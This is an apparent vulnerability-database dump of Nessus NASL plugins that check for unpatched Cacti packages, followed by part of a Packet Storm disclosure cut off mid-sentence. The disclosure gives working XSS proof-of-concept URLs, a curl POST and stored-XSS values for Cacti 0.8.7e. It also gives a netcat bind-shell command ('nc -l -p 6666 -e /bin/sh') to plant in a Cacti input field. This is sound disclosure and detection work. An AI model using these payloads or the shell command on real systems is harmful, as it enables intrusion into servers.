Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2009-12575.NASL", "href": "https://www.tenable.com/plugins/nessus/43602", "published": "2009-12-28T00:00:00", "title": "Fedora 11 : cacti-0.8.7e-3.fc11 (2009-12575)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12575.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43602);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_xref(name:\"FEDORA\", value:\"2009-12575\");\n\n script_name(english:\"Fedora 11 : cacti-0.8.7e-3.fc11 (2009-12575)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This fix contains several official patches from cacti: Command Line\nAdd Graphs Syntax SNMP Invalid Responses Template Import/Export\nDuplication Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.cacti.net/download_patches.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cacti.net/download_patches.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=541279\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/033199.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?23f97cc2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"cacti-0.8.7e-3.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-11-01T02:36:53", "bulletinFamily": "scanner", "description": "The cacti development team reports :\n\nThe Cross-Site Scripting patch has been posted.\n\nThis patch addresses cross-site scripting issues reported by Moritz\nNaumann.", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_04104985D84611DE84E400215AF774F0.NASL", "href": "https://www.tenable.com/plugins/nessus/42874", "published": "2009-11-24T00:00:00", 
"title": "FreeBSD : cacti -- XSS issues (04104985-d846-11de-84e4-00215af774f0)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42874);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/08/02 13:32:39\");\n\n script_cve_id(\"CVE-2009-4032\");\n\n script_name(english:\"FreeBSD : cacti -- XSS issues (04104985-d846-11de-84e4-00215af774f0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The cacti development team reports :\n\nThe Cross-Site Scripting patch has been posted.\n\nThis patch addresses cross-site scripting issues reported by Moritz\nNaumann.\"\n );\n # http://docs.cacti.net/#cross-site_scripting_fixes\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.cacti.net/#cross-site_scripting_fixes\"\n );\n # https://vuxml.freebsd.org/freebsd/04104985-d846-11de-84e4-00215af774f0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?609061dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:cacti\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"cacti<0.8.7e4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-11-01T02:26:40", "bulletinFamily": "scanner", "description": "This fix contains several official patches from cacti: Command Line\nAdd Graphs Syntax SNMP Invalid Responses Template Import/Export\nDuplication Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2009-12560.NASL", "href": "https://www.tenable.com/plugins/nessus/44878", "published": "2010-02-25T00:00:00", "title": "Fedora 12 : cacti-0.8.7e-3.fc12 (2009-12560)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12560.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44878);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-4032\");\n script_bugtraq_id(37109);\n script_xref(name:\"FEDORA\", value:\"2009-12560\");\n\n script_name(english:\"Fedora 12 : cacti-0.8.7e-3.fc12 (2009-12560)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This fix contains several official patches from cacti: Command Line\nAdd Graphs Syntax SNMP Invalid Responses Template Import/Export\nDuplication Cross-Site Scripting Fixes\nhttp://www.cacti.net/download_patches.php\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.cacti.net/download_patches.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cacti.net/download_patches.php\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=541279\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-January/033489.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?deea97a6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"cacti-0.8.7e-3.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-11-03T12:17:21", "bulletinFamily": "scanner", "description": "The package cacti was updated to fix four cross-site-scripting\nvulnerabilities (CVE-2009-4032: CVSS v2 Base Score: 4.9) and one\nprivilege escalation bug (CVE-2009-4112).", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_0_CACTI-091202.NASL", "href": "https://www.tenable.com/plugins/nessus/43025", "published": "2009-12-07T00:00:00", "title": "openSUSE 
Security Update : cacti (cacti-1627)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update cacti-1627.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43025);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:33\");\n\n script_cve_id(\"CVE-2009-4032\", \"CVE-2009-4112\");\n\n script_name(english:\"openSUSE Security Update : cacti (cacti-1627)\");\n script_summary(english:\"Check for the cacti-1627 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The package cacti was updated to fix four cross-site-scripting\nvulnerabilities (CVE-2009-4032: CVSS v2 Base Score: 4.9) and one\nprivilege escalation bug (CVE-2009-4112).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=558664\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(79, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"cacti-0.8.7e-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:21:05", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been found in cacti, a frontend to\nrrdtool for monitoring systems and services. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2007-3112, CVE-2007-3113\n It was discovered that cacti is prone to a denial of\n service via the graph_height, graph_width, graph_start\n and graph_end parameters. 
This issue only affects the\n oldstable (etch) version of cacti.\n\n - CVE-2009-4032\n It was discovered that cacti is prone to several\n cross-site scripting attacks via different vectors.\n\n - CVE-2009-4112\n It has been discovered that cacti allows authenticated\n administrator users to gain access to the host system by\n executing arbitrary commands via the 'Data Input Method'\n for the 'Linux - Get Memory Usage' setting.\n\n There is no fix for this issue at this stage. Upstream will\n implement a whitelist policy to only allow certain 'safe' commands.\n For the moment, we recommend that such access is only given to\n trusted users and that the options 'Data Input' and 'User\n Administration' are otherwise deactivated.", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DSA-1954.NASL", "href": "https://www.tenable.com/plugins/nessus/44819", "published": "2010-02-24T00:00:00", "title": "Debian DSA-1954-1 : cacti - insufficient input sanitising", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1954. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44819);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/08/02 13:32:22\");\n\n script_cve_id(\"CVE-2007-3112\", \"CVE-2007-3113\", \"CVE-2009-4032\", \"CVE-2010-2543\");\n script_bugtraq_id(37109);\n script_xref(name:\"DSA\", value:\"1954\");\n\n script_name(english:\"Debian DSA-1954-1 : cacti - insufficient input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been found in cacti, a frontend to\nrrdtool for monitoring systems and services. The Common\nVulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2007-3112, CVE-2007-3113\n It was discovered that cacti is prone to a denial of\n service via the graph_height, graph_width, graph_start\n and graph_end parameters. 
This issue only affects the\n oldstable (etch) version of cacti.\n\n - CVE-2009-4032\n It was discovered that cacti is prone to several\n cross-site scripting attacks via different vectors.\n\n - CVE-2009-4112\n It has been discovered that cacti allows authenticated\n administrator users to gain access to the host system by\n executing arbitrary commands via the 'Data Input Method'\n for the 'Linux - Get Memory Usage' setting.\n\n There is no fix for this issue at this stage. Upstream will\n implement a whitelist policy to only allow certain 'safe' commands.\n For the moment, we recommend that such access is only given to\n trusted users and that the options 'Data Input' and 'User\n Administration' are otherwise deactivated.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=429224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-3113\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1954\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cacti packages.\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"cacti\", reference:\"0.8.6i-3.6\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"cacti\", reference:\"0.8.7b-2.1+lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:24", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-27T00:00:00", "published": "2009-11-27T00:00:00", "href": 
"https://packetstormsecurity.com/files/83264/Cacti-0.8.7e-Cross-Site-Scripting.html", "id": "PACKETSTORM:83264", "type": "packetstorm", "title": "Cacti 0.8.7e Cross Site Scripting", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA512 \n \nCacti 0.8.7e and earlier versions are affected by multiple security \nissues. Issues 1-4 are cross site scripting issues, issue 5 is a \npriviledge escalation issue. \n \n \n \n \n1. XSS 1 \n \nA HTTP GET request against the following URL will, on a web browser \nwith Javascript support, cause a dialog box saying '1' to be displayed: \n \nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27 \n \nThis vulnerability is only exploitable if the victim is allowed to view \ngraphs. This will be true if the victim has previously authenticated \nagainst Cacti or if both the guest user has been activated (default: \ndisabled) and the graph view permission was set to 'guest' (default: \n'No User'). \n \nThis vulnerability was tested with Firefox 3.0.6. \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n2. XSS 2 \n \nThe following curl invocation will generate a HTTP POST request \nagainst \n \nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true \n \nwith an 'application/x-www-form-urlencoded' content type HTTP body part \ncontaining \ndate1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27' \nCurl will write the resulting output to a file named poc.html. \n \n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html \n \nWhen this file is loaded and rendered by a web browser with Javascript \nsupport, this will cause a dialog box saying '2' to be displayed. 
\n \nThis vulnerability is only exploitable if the victim is allowed to view \ngraphs. This will be true if the victim has previously authenticated \nagainst Cacti or if both the guest user has been activated (default: \ndisabled) and the graph view permission was set to 'guest' (default: \n'No User'). \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n3. XSS 3 \n \nIf an attacker or the victim has permission to modify the graph \ndisplay settings via graph_settings.php, the attacker is able to \npersistently inject javascript code via the 'page_refresh' and \n'default_dual_pane_width' parameters. \n \nSetting 'page_refresh' to the following value will, on any consecutive \nvisitors' web browser with Javascript support, cause a dialog box saying \n'3' to be displayed: \n300'><script>alert(3)</script><x y=' \n \nSetting 'default_dual_pane_width' to the following value will, on any \nconsecutive visitors' web browser with Javascript support, cause a \ndialog box saying '3' to be displayed: \n200\"><script>alert(3)</script><x y=\" \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n4. XSS 4 \n \nA HTTP GET request against the following URL will, on a web browser \nwith Javascript support, cause a dialog box saying '4' to be displayed: \n \n> > \nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E \n \nThis vulnerability is only exploitable if the victim is allowed to view \ngraphs. This will be true if the victim has previously authenticated \nagainst Cacti or if both the guest user has been activated (default: \ndisabled) and the graph view permission was set to 'guest' (default: \n'No User'). 
\n \nAlternatively, a similar injection can be achieved, if an attacker or \nhis victim has permission to modify the graph display settings via \ngraph_settings.php. If so, the attacker is able to persistently inject \njavascript code via the 'title_size', 'legend_size', 'axis_size' and \n'unit_size' parameters. \n \nSetting any of these parameters to the following value will, on any \nconsecutive visitors' web browser with Javascript support, cause a \ndialog box saying '4' to be displayed: \n8</pre><script>alert(4)</script><pre> \n \nThis vulnerability was tested with Firefox 3.0.6 \n \nThe Cacti group provides a patch to fix this vulnerability: \nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch \n \n \n \n5. Priviledge escalation \n \nFinally, due to the permissive way the web interface allows Cacti \nto be configured, a cacti administrator is also able to execute \narbitrary commands on the system as the user the Cacti polling mechanism \nruns as (usually a non-priviledged user). \n \nFor example, it is possible to successfully spawn (and connect to) a \nbackdoor/remote shell on the Cacti system by changing the \"Data Input \nMethod\" for \"Linux - Get Memory Usage\". Setting \"Input String\" to \nnohup nc -l -p 6666 -n -e /bin/sh & \nwould spawn a remotely accessible shell whenever this handler was called \n(every couple of minutes by default on my Debian test system). \n \nCacti developers say: \n> There is no effective way to fix the data input method without breaking Cacti. It will be reviewed for the release of 0.8.8. \n \n \n \nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs \nmay or may not be assigned), 